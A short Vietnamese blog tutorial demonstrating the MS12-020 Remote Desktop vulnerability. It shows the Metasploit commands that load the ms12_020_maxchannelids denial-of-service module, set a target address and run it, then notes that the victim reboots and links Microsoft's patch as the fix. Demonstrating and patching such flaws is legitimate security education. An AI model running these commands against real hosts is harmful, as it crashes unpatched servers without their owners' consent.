sử dụng Backtrack MS12-020

now browsing by tag

 
 
Posted by: | Posted on: May 9, 2016

Demo khai thác và fix lổ hổng MS12-020

Demo khai thác và fix lổ hổng MS12-020

Lỗ hổng bảo mật này cho phép hacker từ xa có thể làm tê liệt hoàn toàn máy tính bằng cách cài đặt các mã độc khi máy tính có mở dịch vụ Remote Desktop Protocol (RDP)

1. Demo: Sử dụng BackTrack 5R3

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options

Demo khai thac va fix lo hong MS12-020 show options

msf auxiliary(ms12_020_maxchannelids) > set RHOST 10.0.2.52

Demo khai thac va fix lo hong MS12-020 set RHOST

msf auxiliary(ms12_020_maxchannelids) > exploit

Demo khai thac va fix lo hong MS12-020 exploit

2. Kết quả trên Victim: Khởi động lại sau vài giây

Demo khai thac va fix lo hong MS12-020 Victim

3. Khắc phục

– Update bản vá cho Windows Server 2008 Enterprise SP1 (như trong video dưới)
Hoặc download bản vá cho các phiên bản windows khác tại: https://technet.microsoft.com/library/security/ms12-020

Xem thêm video demo khai thác và fix lổ hổng MS12-020:

Content Protection by DMCA.com